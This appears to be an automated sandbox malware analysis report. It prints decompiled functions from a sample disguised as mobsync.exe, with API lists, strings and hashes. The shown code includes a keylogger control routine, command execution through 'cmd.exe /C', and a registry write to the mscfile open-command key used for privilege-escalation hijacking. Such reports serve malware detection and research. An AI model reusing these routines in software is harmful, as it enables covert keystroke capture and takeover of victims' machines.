0x0044576c
0x0044576e
0x00445770
0x00445772
0x00445774
0x0044577f
0x00000000
0x0044577f
0x00445774
0x00445770
0x00000000
0x0044576c
0x00445785
0x00445787
0x0044578a
0x004457a3
0x004457a3
0x004457a5
0x004457a8
0x004457b8
0x004457ba
0x004457ba
0x004457aa
0x004457aa
0x004457ad
0x00000000
0x004457af
0x004457af
0x004457b2
0x00000000
0x004457b4
0x004457b4
0x004457b4
0x004457b2
0x004457ad
0x004457c8
0x004457cc
0x004457da
0x004457df
0x004457f4
0x004457f6
0x004457fc
0x004457ff
0x00445831
0x00445831
0x00445836
0x0044583c
0x0044583c
0x00445843
0x0044585d
0x0044585d
0x0044585e
0x00445864
0x0044586a
0x0044586b
0x0044586c
0x00445871
0x00445874
0x00445876
0x00000000
0x00000000
0x00000000
0x00000000
0x00445845
0x00445845
0x0044584b
0x0044584d
0x00000000
0x0044584f
0x0044584f
0x00445852
0x00000000
0x00445854
0x00445854
0x0044585b
0x00000000
0x00000000
0x00000000
0x00000000
0x0044585b
0x00445852
0x0044584d
0x00000000
0x00445878
0x00445880
0x00445886
0x00445888
0x00445888
0x00445890
0x00445895
0x0044589d
0x004458a0
0x004458a2
0x004458b6
0x004458bb
0x00445801
0x00445801
0x00445802
0x00445803
0x00445804
0x00445805
0x0044580d
0x0044580d
0x0044580d
0x0044580f
0x00445812
0x00445815
0x00445815
0x0044578c
0x0044578f
0x00445791
0x00000000
0x00445793
0x00445793
0x00445796
0x00445797
0x00445798
0x00445799
0x0044579e
0x00445791
0x0044581d
0x00445822
0x0044582d
0x00000000
0x00000000
0x00000000
0x004456fb
0x004456cf
0x004456d1
0x0044572d
0x00445731
0x00445731
0x00000000
0x00000000
0x00000000
0x00000000
0x00445666
0x00445669
0x0044566c
0x0044566f
0x00445672
0x00445675
0x00445678
0x00445678
0x00000000
0x00445635
0x00445617
0x00445617
0x00445683
0x00445685
0x00000000
0x0044568a
0x00445559
0x00445559
0x0044555c
0x00445565
0x00445568
0x0044556f
0x00445571
0x0044558a
0x0044558b
0x0044558c
0x0044558e
0x00445593
0x00445573
0x00445573
0x00445576
0x00445577
0x00445579
0x0044557b
0x0044557d
0x00445582
0x00445582
0x00445596
0x00445598
0x0044559a
0x00000000
0x00000000
0x004455a0
0x004455a3
0x004455a5
0x004455a7
0x00000000
0x004455a9
0x004455a9
0x004455ac
0x00000000
0x004455ac
0x00000000
0x004455a7
0x0044568b
0x0044568e
0x00445693
0x00000000
0x00445696
0x00445529
0x00445529
0x00445530
0x00445531
0x00445533
0x00445538
0x00445697
0x0044569b
0x0044569b
0x00000000

APIs

_strpbrk.LIBCMT ref: 00445568
_free.LIBCMT ref: 00445685

Part of subcall function 0043629A: IsProcessorFeaturePresent.KERNEL32(00000017,0043626C,00000000,00000000,?,00411D8F,?,00000000,?,?,0043628C,00000000,00000000,00000000,00000000,00000000), ref: 0043629C
Part of subcall function 0043629A: GetCurrentProcess.KERNEL32(C0000417), ref: 004362BE
Part of subcall function 0043629A: TerminateProcess.KERNEL32(00000000), ref: 004362C5

Strings

*?, xrefs: 0044555C
., xrefs: 0044583C

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: c8d3f06c4dcc995ae01c19de9541e6a98e9506058c460169c8d62490cc4ba0f9
Instruction ID: 9a964df7e2ccefeecbf26bda24bf2b163005b59dfbd6a4608a1e3f741a932d91
Opcode Fuzzy Hash: c8d3f06c4dcc995ae01c19de9541e6a98e9506058c460169c8d62490cc4ba0f9
Instruction Fuzzy Hash: AF51E371E0060AAFEF10CFA9C881ABEB7B5EF58314F25416EE454E7301EA799E018B54

Uniqueness

Uniqueness Score: -1.00%

Function 0043B909, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0043B909(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					L00445E89(_t52);
					GetModuleFileNameA(0, 0x46b3c8, 0x104);
					_t49 =  *0x46ba3c; // 0x30e34b8
					 *0x46ba44 = 0x46b3c8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x46b3c8;
					}
					_v8 = 0;
					_v16 = 0;
					E0043BA2D(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = L0043BBA2(_v8, _v16, 1);
					if(_t64 != 0) {
						E0043BA2D(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E004459A4(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x46ba30 = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x46ba34 = _t59;
									L16:
									L0043EE85(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x46ba30 = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x46ba34 = _t43;
						goto L10;
					} else {
						_t44 = L00439E14();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						L0043EE85(_t64);
						return _t50;
					}
				} else {
					_t45 = L00439E14();
					_t65 = 0x16;
					 *_t45 = _t65;
					E0043626D();
					return _t65;
				}
			}

0x0043b909
0x0043b916
0x0043b936
0x0043b949
0x0043b94f
0x0043b955
0x0043b95d
0x0043b964
0x0043b964
0x0043b969
0x0043b970
0x0043b977
0x0043b989
0x0043b990
0x0043b9af
0x0043b9bb
0x0043b9d6
0x0043b9d9
0x0043b9e0
0x0043b9e6
0x0043b9ed
0x0043b9f0
0x0043b9f2
0x0043b9f6
0x0043ba00
0x0043ba00
0x0043ba02
0x0043ba08
0x0043ba0b
0x0043ba0d
0x0043ba13
0x0043ba14
0x0043ba1a
0x00000000
0x00000000
0x00000000
0x00000000
0x0043b9f8
0x0043b9f8
0x0043b9f8
0x0043b9fb
0x0043b9fc
0x00000000
0x0043b9f8
0x0043b9e8
0x00000000
0x0043b9e8
0x0043b9c1
0x0043b9c6
0x0043b9c8
0x0043b9ca
0x00000000
0x0043b992
0x0043b992
0x0043b997
0x0043b999
0x0043b99a
0x0043b9cf
0x0043b9cf
0x0043ba1d
0x0043ba1e
0x00000000
0x0043ba27
0x0043b91e
0x0043b91e
0x0043b925
0x0043b926
0x0043b928
0x00000000
0x0043b92d

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\mobsync.exe,00000104), ref: 0043B949
_free.LIBCMT ref: 0043BA14
_free.LIBCMT ref: 0043BA1E

Strings

C:\Windows\SysWOW64\mobsync.exe, xrefs: 0043B940, 0043B947, 0043B976, 0043B9AE

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\SysWOW64\mobsync.exe
API String ID: 2506810119-2325505231
Opcode ID: a59b868e129dfb56bfba934e57b625dbe17505cc7e5d55d3db279bdf8f9f960f
Instruction ID: 660ae339c78687f970f45cd6768a2251d83b04d254988ce5d7869c99c620db43
Opcode Fuzzy Hash: a59b868e129dfb56bfba934e57b625dbe17505cc7e5d55d3db279bdf8f9f960f
Instruction Fuzzy Hash: BD3173B1A01618AFDB21DF999881BAFBBA8EF89710F10506BE604D7311D7744E41CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 00417868, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 0041795D

Part of subcall function 00410497: RegCreateKeyA.ADVAPI32 ref: 004104A6
Part of subcall function 00410497: RegSetValueExA.KERNEL32(0045F6E8,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,00417937,WallpaperStyle,0045F6E8,?,00000001,00000000,00000000), ref: 004104CE
Part of subcall function 00410497: RegCloseKey.ADVAPI32(0045F6E8,?,?,00417937,WallpaperStyle,0045F6E8,?,00000001,00000000,00000000,?,00412B26), ref: 004104D9

Strings

Control Panel\Desktop, xrefs: 004178A3, 004178D6, 00417926
WallpaperStyle, xrefs: 004178A8, 004178DB, 0041792B
TileWallpaper, xrefs: 00417947

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: 47b5b6e887e2c63b628224bd0d5ee3a84375c97a0d82e9b925801ffdf3f0e7b5
Instruction ID: fa13f98970d9a9ebbc3df1aa31e4731e3fb9772d8354761676ac4eeabfab18a3
Opcode Fuzzy Hash: 47b5b6e887e2c63b628224bd0d5ee3a84375c97a0d82e9b925801ffdf3f0e7b5
Instruction Fuzzy Hash: A5116332B8434072D818307A4E5FBAF18159746F61FA0416BB7013A6C6E8DF4A9943DF

Uniqueness

Uniqueness Score: -1.00%

Function 00409520, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00409520(void* __ebx, struct HHOOK__** __ecx) {
				char _v28;
				void* __edi;
				struct HHOOK__** _t29;
				void* _t30;
				void* _t31;

				_t19 = __ebx;
				_t29 = __ecx;
				_t35 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					__eflags = 0;
					return 0;
				}
				_t28 = "Online Keylogger Stopped";
				E00402064(__ebx,  &_v28, "Online Keylogger Stopped");
				_t31 = _t30 - 0x18;
				L00416C32(_t31,  &_v28);
				E00409636(__ebx, _t29, _t35);
				L00401FA7();
				_t32 = _t31 - 0x18;
				E00402064(__ebx, _t31 - 0x18, "Online Keylogger Stopped");
				E00402064(_t19, _t32 - 0x18, "[Info]");
				E004165D8(_t19, _t28);
				_t29[0x12] = 0;
				CloseHandle(_t29[0xf]);
				if(_t29[0x12] == 0 &&  *_t29 != 0) {
					UnhookWindowsHookEx( *_t29);
					 *_t29 =  *_t29 & 0x00000000;
				}
				return 1;
			}

0x00409520
0x00409527
0x0040952a
0x0040952e
0x004095a3
0x00000000
0x004095a3
0x00409530
0x00409539
0x0040953e
0x00409546
0x0040954d
0x00409555
0x0040955a
0x00409560
0x0040956f
0x00409574
0x0040957c
0x00409583
0x0040958d
0x00409596
0x0040959c
0x0040959c
0x00000000

APIs

Part of subcall function 00409636: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409644
Part of subcall function 00409636: wsprintfW.USER32 ref: 004096C5
Part of subcall function 00409636: SetEvent.KERNEL32(?,00000000), ref: 004096EF

Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2

CloseHandle.KERNEL32(?), ref: 00409583
UnhookWindowsHookEx.USER32 ref: 00409596

Strings

Online Keylogger Stopped, xrefs: 00409530, 00409538, 0040955F
[Info], xrefs: 0040956A

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped$[Info]
API String ID: 3650414481-1913360614
Opcode ID: 567903534c257d61fb341000e83260366c6535075c645e05c7afeea01dc38569
Instruction ID: 5d632db0778c86123480600154419b6f65a677741df4c82794f5c8cb08535fc7
Opcode Fuzzy Hash: 567903534c257d61fb341000e83260366c6535075c645e05c7afeea01dc38569
Instruction Fuzzy Hash: 4E01D631A003006BD7257735C90B77E7B615B41305F80006EE941221D3DA7D5D59C3DA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C42E, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C49C

Strings

ios_base::failbit set, xrefs: 0040C47E
ios_base::badbit set, xrefs: 0040C458
ios_base::eofbit set, xrefs: 0040C48B

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: dde685a601103c153de46ebab1e7bbbed74b5751b1f2c8c3c684da15b82d945a
Instruction ID: 00d2e120a14ed07e696206c725bb703fde342002c12277e6dbbb730505fe52c1
Opcode Fuzzy Hash: dde685a601103c153de46ebab1e7bbbed74b5751b1f2c8c3c684da15b82d945a
Instruction Fuzzy Hash: 0001D671580208FAD710EB51C8E3F7E7358AF14705F20826FB915791C3EA7C6542866F

Uniqueness

Uniqueness Score: -1.00%

Function 00412092, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412092(void* __edx, void* __ebp, void* __eflags, char _a16, char _a60, void* _a92, char _a96, void* _a128, void* _a152) {
				void* _t11;

				_t41 = __eflags;
				_t11 = E0040425F(0,  &_a96, L00401F75(L00401E29( &_a16, __edx, __eflags, 0)));
				_t35 = L"/C ";
				ShellExecuteW(0, L"open", L"cmd.exe", L00401ECB(E004043E5(0,  &_a60, L"/C ", _t41, _t11)), 0, 0);
				L00401ED0();
				L00401ED0();
				L00401E54( &_a16, _t35);
				L00401FA7();
				L00401FA7();
				return 0;
			}

0x00412092
0x004120ac
0x004120b2
0x004120d4
0x004120de
0x00412b2a
0x00412d65
0x00412d71
0x00412d7d
0x00412d8a

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004120D4

Strings

cmd.exe, xrefs: 004120C9
open, xrefs: 004120CE
/C , xrefs: 004120B2

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 75b6f1f07e47905a4a215c2afab8e280ce0f802d9649170868161add4ec390d7
Instruction ID: c2a54c5d25423007233d6e2fd92019bc1db18d9fdb92d93029f1e952cb8c39d0
Opcode Fuzzy Hash: 75b6f1f07e47905a4a215c2afab8e280ce0f802d9649170868161add4ec390d7
Instruction Fuzzy Hash: AEF036712083415BC214FB72DC92DAF7398AF90349F50183FB546A21F2EF7C9919865A

Uniqueness

Uniqueness Score: -1.00%

Function 0041033E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041033E(void* __ecx) {
				void* _v8;
				int _v12;
				char _v2060;
				void* _t17;
				void* _t21;

				_v12 = 0x400;
				_t21 = __ecx;
				if(RegOpenKeyExW(0x80000000, L"http\\shell\\open\\command", 0, 0x20019,  &_v8) != 0) {
					_push( &E0045F714);
				} else {
					RegQueryValueExW(_v8, 0, 0, 0,  &_v2060,  &_v12);
					RegCloseKey(_v8);
					_push( &_v2060);
				}
				E0040425F(_t17, _t21);
				return _t21;
			}

0x0041034c
0x0041035b
0x00410370
0x0041039b
0x00410372
0x00410383
0x0041038c
0x00410398
0x00410398
0x004103a2
0x004103ae

APIs

RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0046C578,?), ref: 00410368
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00410383
RegCloseKey.ADVAPI32(00000000), ref: 0041038C

Strings

http\shell\open\command, xrefs: 0041035E

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: http\shell\open\command
API String ID: 3677997916-1487954565
Opcode ID: b49ceec60dfc3fce62ad31f5d248fca9093cf6a4bcf6e207aa74a06b3a315b32
Instruction ID: 174bb4f21a826f001835e6ed766069888861b3d143c64ebc0b38a31aaf37e10a
Opcode Fuzzy Hash: b49ceec60dfc3fce62ad31f5d248fca9093cf6a4bcf6e207aa74a06b3a315b32
Instruction Fuzzy Hash: 49F0C87150020CFBDB109A95EC09FDFBBBCEB85B02F1000A6B905E2050DA705A8587A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041053C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041053C(void* __ecx, short* __edx, short* _a4, char _a8, int _a32) {
				void* _v8;
				signed int _t17;
				long _t20;
				signed int _t22;
				signed int _t23;

				_push(__ecx);
				_push(_t22);
				if(RegCreateKeyW(__ecx, __edx,  &_v8) != 0) {
					_t23 = 0;
				} else {
					_t17 = E00402469();
					_t20 = RegSetValueExW(_v8, _a4, 0, _a32, L00401ECB( &_a8), 2 + _t17 * 2);
					RegCloseKey(_v8);
					_t23 = _t22 & 0xffffff00 | _t20 == 0x00000000;
				}
				L00401ED0();
				return _t23;
			}

0x0041053f
0x00410540
0x0041054f
0x0041058f
0x00410551
0x00410555
0x00410576
0x00410581
0x0041058a
0x0041058a
0x00410594
0x0041059f

APIs

RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,?), ref: 00410547
RegSetValueExW.ADVAPI32(?,0045F714,00000000,?,00000000,00000000,0045F714,?,00405FD3,0045F714,C:\Windows\SysWOW64\mobsync.exe), ref: 00410576
RegCloseKey.ADVAPI32(?,?,00405FD3,0045F714,C:\Windows\SysWOW64\mobsync.exe), ref: 00410581

Strings

Software\Classes\mscfile\shell\open\command, xrefs: 00410545

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Software\Classes\mscfile\shell\open\command
API String ID: 1818849710-505396733
Opcode ID: a35e9fdccbfdf302e20eb1c5f584b642d4dc0ca59b759b305b479fe12c5b93c2
Instruction ID: b35e326baa4341fdc783df4f92487e38f7185df5fc588de708a2e43aa04f4aed
Opcode Fuzzy Hash: a35e9fdccbfdf302e20eb1c5f584b642d4dc0ca59b759b305b479fe12c5b93c2
Instruction Fuzzy Hash: B3F0A932400218BBCF109FA1ED0AEEE776CEB04782F00462ABD05A60A1EA759F14DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00401397, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401397() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x46c5cc = _t2;
				return _t2;
			}

0x004013a8
0x004013ae
0x004013b3

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013A1
GetProcAddress.KERNEL32(00000000), ref: 004013A8

Strings

User32.dll, xrefs: 0040139C
GetCursorInfo, xrefs: 00401397

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: e391e7f58ddd6f85363347764197a1ee543d9a7801bc0fe363ffb3f057bbb63e
Instruction ID: d3bda5949b9d116e285d55fbc59b8e5d8e53a04c9e9cedd27b105f6a33248ad0
Opcode Fuzzy Hash: e391e7f58ddd6f85363347764197a1ee543d9a7801bc0fe363ffb3f057bbb63e
Instruction Fuzzy Hash: 31B092F1580B00AB87007FA0AC0D9193EA4F648743F2045BAF042929A1EBB891148F1F

Uniqueness

Uniqueness Score: -1.00%

Function 00401452, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401452() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x46ca68 = _t2;
				return _t2;
			}

0x00401463
0x00401469
0x0040146e

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 0040145C
GetProcAddress.KERNEL32(00000000), ref: 00401463

Strings

GetLastInputInfo, xrefs: 00401452
User32.dll, xrefs: 00401457

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: c7935df8b6a38178698e2295717041de868490c523127cd3d72a117022a8c59f
Instruction ID: a8f1c5a083774e383246da89c7c1d95a8e0abaf71fe038d6a5d2766fcd81b51d
Opcode Fuzzy Hash: c7935df8b6a38178698e2295717041de868490c523127cd3d72a117022a8c59f
Instruction Fuzzy Hash: 69B092F4641B00AB8700AFE0AC8DA053EA8A644B47F2002A3B09196961EBB88244CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040146F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040146F() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
				 *0x46ca6c = _t2;
				return _t2;
			}

0x00401480
0x00401486
0x0040148b

APIs

LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00401479
GetProcAddress.KERNEL32(00000000), ref: 00401480

Strings

kernel32.dll, xrefs: 00401474
GetConsoleWindow, xrefs: 0040146F

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetConsoleWindow$kernel32.dll
API String ID: 2574300362-100875112
Opcode ID: e3ac8940ee1cd37045cf06dacc4217d977a61d04c0bc9ee1a52c0efbbd79daa2
Instruction ID: 5a97185418b63760bbf8986895f03466fab36a6e56cd4c50a02a3f426b50f970
Opcode Fuzzy Hash: e3ac8940ee1cd37045cf06dacc4217d977a61d04c0bc9ee1a52c0efbbd79daa2
Instruction Fuzzy Hash: C3B092B5681B00ABCA106FA2AD0DA0A3E68A604B43B1044A2F15582561EAB882048F1E

Uniqueness

Uniqueness Score: -1.00%

Function 00442490, Relevance: 6.3, APIs: 4, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00442490(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				L00434E17(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0x74000000
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00450650( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00450650( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xff8bc35f
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
